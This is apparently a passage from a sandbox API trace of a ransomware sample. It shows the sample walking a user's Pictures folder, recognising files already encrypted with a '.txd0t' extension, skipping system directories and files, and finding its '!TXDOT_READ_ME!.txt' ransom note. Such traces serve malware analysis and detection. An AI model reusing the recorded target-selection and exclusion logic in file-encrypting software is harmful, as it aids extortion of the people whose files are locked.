[0090.246] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6004be50, ftCreationTime.dwHighDateTime=0x1d5ed5e, ftLastAccessTime.dwLowDateTime=0xf3c22a90, ftLastAccessTime.dwHighDateTime=0x1d5e4f0, ftLastWriteTime.dwLowDateTime=0x5257a7a9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3454, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="gpNFvPMeWkFC.gif.txd0t", cAlternateFileName="GPNFVP~1.TXD")) returned 1 [0090.246] StrCmpW (psz1="gpNFvPMeWkFC.gif.txd0t", psz2=".") returned 1 [0090.246] StrCmpW (psz1="gpNFvPMeWkFC.gif.txd0t", psz2="..") returned 1 [0090.246] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.246] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.246] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="gpNFvPMeWkFC.gif.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif.txd0t" [0090.246] PathFindExtensionW (pszPath="gpNFvPMeWkFC.gif.txd0t") returned=".txd0t" [0090.246] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.246] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cb41f0, ftCreationTime.dwHighDateTime=0x1d5ed24, ftLastAccessTime.dwLowDateTime=0xd75a8bc0, ftLastAccessTime.dwHighDateTime=0x1d5e790, ftLastWriteTime.dwLowDateTime=0x5257a7a9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16b18, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="g_PWWk0DwHdiVJ7TQ.jpg.txd0t", cAlternateFileName="G_PWWK~1.TXD")) returned 1 [0090.246] StrCmpW (psz1="g_PWWk0DwHdiVJ7TQ.jpg.txd0t", psz2=".") returned 1 [0090.246] StrCmpW (psz1="g_PWWk0DwHdiVJ7TQ.jpg.txd0t", psz2="..") returned 1 [0090.246] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.246] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.246] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="g_PWWk0DwHdiVJ7TQ.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg.txd0t" [0090.246] PathFindExtensionW (pszPath="g_PWWk0DwHdiVJ7TQ.jpg.txd0t") returned=".txd0t" [0090.246] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.246] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36585490, ftCreationTime.dwHighDateTime=0x1d5e6e7, ftLastAccessTime.dwLowDateTime=0x861a3360, ftLastAccessTime.dwHighDateTime=0x1d5e4e7, ftLastWriteTime.dwLowDateTime=0x526859a7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xaa2d, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="JNDCEREvKtt-06-A0UX8.png.txd0t", cAlternateFileName="JNDCER~1.TXD")) returned 1 [0090.246] StrCmpW (psz1="JNDCEREvKtt-06-A0UX8.png.txd0t", psz2=".") returned 1 [0090.246] StrCmpW (psz1="JNDCEREvKtt-06-A0UX8.png.txd0t", psz2="..") returned 1 [0090.246] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.246] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.246] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="JNDCEREvKtt-06-A0UX8.png.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png.txd0t" [0090.246] PathFindExtensionW (pszPath="JNDCEREvKtt-06-A0UX8.png.txd0t") returned=".txd0t" [0090.246] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.246] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf84b3990, ftCreationTime.dwHighDateTime=0x1d5e44a, ftLastAccessTime.dwLowDateTime=0x52f50403, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52f50403, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="kG7T_G4j-", cAlternateFileName="KG7T_G~1")) returned 1 [0090.246] StrCmpW (psz1="kG7T_G4j-", psz2=".") returned 1 [0090.246] StrCmpW (psz1="kG7T_G4j-", psz2="..") returned 1 [0090.246] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.246] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.246] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="kG7T_G4j-", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0090.246] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\windows\\system32\\") returned 0x0 [0090.246] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\windows\\system\\") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\appdata\\local\\") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\boot\\") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\perflogs\\") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\programdata\\") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\drivers\\") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\wsus\\") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="crypt_detect") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="cryptolocker") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="ransomware") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="C:\\WINDOWS") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.247] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="C:\\Program Files") returned 0x0 [0090.247] GetProcessHeap () returned 0xe30000 [0090.247] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c6) returned 0xedb108 [0090.247] StrCpyNW (in: psz1=0xedb108, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0090.247] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\*", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\*") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\*" [0090.247] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf84b3990, ftCreationTime.dwHighDateTime=0x1d5e44a, ftLastAccessTime.dwLowDateTime=0x52f50403, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52f50403, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec20f0 [0090.247] StrCmpW (psz1=".", psz2=".") returned 0 [0090.247] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf84b3990, ftCreationTime.dwHighDateTime=0x1d5e44a, ftLastAccessTime.dwLowDateTime=0x52f50403, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52f50403, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.247] StrCmpW (psz1="..", psz2=".") returned 1 [0090.247] StrCmpW (psz1="..", psz2="..") returned 0 [0090.248] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527dccf3, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x527dccf3, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x528031d3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.248] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.248] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.248] StrCpyNW (in: psz1=0xedb108, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0090.248] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0090.248] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt" [0090.248] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.248] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.248] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.248] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.248] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.248] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.248] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.248] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.248] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.248] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.248] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.248] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.248] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.248] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.248] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.248] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.248] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41835e50, ftCreationTime.dwHighDateTime=0x1d5e0f7, ftLastAccessTime.dwLowDateTime=0x8ec64f00, ftLastAccessTime.dwHighDateTime=0x1d5ee90, ftLastWriteTime.dwLowDateTime=0x52790b5f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1599e, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="-aUMUjkCqPRwR9Vt.gif.txd0t", cAlternateFileName="-AUMUJ~1.TXD")) returned 1 [0090.248] StrCmpW (psz1="-aUMUjkCqPRwR9Vt.gif.txd0t", psz2=".") returned 1 [0090.248] StrCmpW (psz1="-aUMUjkCqPRwR9Vt.gif.txd0t", psz2="..") returned 1 [0090.248] StrCpyNW (in: psz1=0xedb108, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0090.248] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0090.248] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="-aUMUjkCqPRwR9Vt.gif.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif.txd0t" [0090.248] PathFindExtensionW (pszPath="-aUMUjkCqPRwR9Vt.gif.txd0t") returned=".txd0t" [0090.248] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.248] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc6d5fd0, ftCreationTime.dwHighDateTime=0x1d5edd1, ftLastAccessTime.dwLowDateTime=0xb43a1e40, ftLastAccessTime.dwHighDateTime=0x1d5e226, ftLastWriteTime.dwLowDateTime=0x527b6b58, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xd0b1, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="0 jXVleh5y.bmp.txd0t", cAlternateFileName="0JXVLE~1.TXD")) returned 1 [0090.248] StrCmpW (psz1="0 jXVleh5y.bmp.txd0t", psz2=".") returned 1 [0090.248] StrCmpW (psz1="0 jXVleh5y.bmp.txd0t", psz2="..") returned 1 [0090.248] StrCpyNW (in: psz1=0xedb108, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0090.249] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0090.249] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="0 jXVleh5y.bmp.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp.txd0t" [0090.249] PathFindExtensionW (pszPath="0 jXVleh5y.bmp.txd0t") returned=".txd0t" [0090.249] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.249] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8322180, ftCreationTime.dwHighDateTime=0x1d5e70a, ftLastAccessTime.dwLowDateTime=0x179c8e20, ftLastAccessTime.dwHighDateTime=0x1d5e509, ftLastWriteTime.dwLowDateTime=0x527b6b58, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xe05c, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="3w6B72hITb.png.txd0t", cAlternateFileName="3W6B72~1.TXD")) returned 1 [0090.249] StrCmpW (psz1="3w6B72hITb.png.txd0t", psz2=".") returned 1 [0090.249] StrCmpW (psz1="3w6B72hITb.png.txd0t", psz2="..") returned 1 [0090.249] StrCpyNW (in: psz1=0xedb108, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0090.249] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0090.249] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="3w6B72hITb.png.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png.txd0t" [0090.249] PathFindExtensionW (pszPath="3w6B72hITb.png.txd0t") returned=".txd0t" [0090.249] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.249] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84cc6c70, ftCreationTime.dwHighDateTime=0x1d5f005, ftLastAccessTime.dwLowDateTime=0x9fe13da0, ftLastAccessTime.dwHighDateTime=0x1d5ec82, ftLastWriteTime.dwLowDateTime=0x528031d3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13318, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="Bn2jVBj5I1Q6.png.txd0t", cAlternateFileName="BN2JVB~1.TXD")) returned 1 [0090.249] StrCmpW (psz1="Bn2jVBj5I1Q6.png.txd0t", psz2=".") returned 1 [0090.249] StrCmpW (psz1="Bn2jVBj5I1Q6.png.txd0t", psz2="..") returned 1 [0090.249] StrCpyNW (in: psz1=0xedb108, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0090.249] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0090.249] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="Bn2jVBj5I1Q6.png.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png.txd0t" [0090.249] PathFindExtensionW (pszPath="Bn2jVBj5I1Q6.png.txd0t") returned=".txd0t" [0090.249] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.249] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a8373f0, ftCreationTime.dwHighDateTime=0x1d5e96e, ftLastAccessTime.dwLowDateTime=0x951ba230, ftLastAccessTime.dwHighDateTime=0x1d5ee9d, ftLastWriteTime.dwLowDateTime=0x528031d3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1829f, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="bwUCcMWGBF1Mcn_.gif.txd0t", cAlternateFileName="BWUCCM~1.TXD")) returned 1 [0090.249] StrCmpW (psz1="bwUCcMWGBF1Mcn_.gif.txd0t", psz2=".") returned 1 [0090.249] StrCmpW (psz1="bwUCcMWGBF1Mcn_.gif.txd0t", psz2="..") returned 1 [0090.249] StrCpyNW (in: psz1=0xedb108, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0090.249] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0090.249] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="bwUCcMWGBF1Mcn_.gif.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif.txd0t" [0090.249] PathFindExtensionW (pszPath="bwUCcMWGBF1Mcn_.gif.txd0t") returned=".txd0t" [0090.249] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.249] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ee86190, ftCreationTime.dwHighDateTime=0x1d5e585, ftLastAccessTime.dwLowDateTime=0x14aa8600, ftLastAccessTime.dwHighDateTime=0x1d5ec56, ftLastWriteTime.dwLowDateTime=0x52f50403, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x8186, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="cBmZZ5bX2Jx3bJhbUv.bmp.txd0t", cAlternateFileName="CBMZZ5~1.TXD")) returned 1 [0090.249] StrCmpW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp.txd0t", psz2=".") returned 1 [0090.249] StrCmpW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp.txd0t", psz2="..") returned 1 [0090.249] StrCpyNW (in: psz1=0xedb108, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0090.249] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0090.249] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="cBmZZ5bX2Jx3bJhbUv.bmp.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp.txd0t" [0090.250] PathFindExtensionW (pszPath="cBmZZ5bX2Jx3bJhbUv.bmp.txd0t") returned=".txd0t" [0090.250] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.250] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309a2510, ftCreationTime.dwHighDateTime=0x1d5eabb, ftLastAccessTime.dwLowDateTime=0x655909d0, ftLastAccessTime.dwHighDateTime=0x1d5e9c9, ftLastWriteTime.dwLowDateTime=0x528756de, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x55ff, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="e0RUl3aLEh6brT_yeUb0.jpg.txd0t", cAlternateFileName="E0RUL3~1.TXD")) returned 1 [0090.250] StrCmpW (psz1="e0RUl3aLEh6brT_yeUb0.jpg.txd0t", psz2=".") returned 1 [0090.250] StrCmpW (psz1="e0RUl3aLEh6brT_yeUb0.jpg.txd0t", psz2="..") returned 1 [0090.250] StrCpyNW (in: psz1=0xedb108, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0090.271] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: 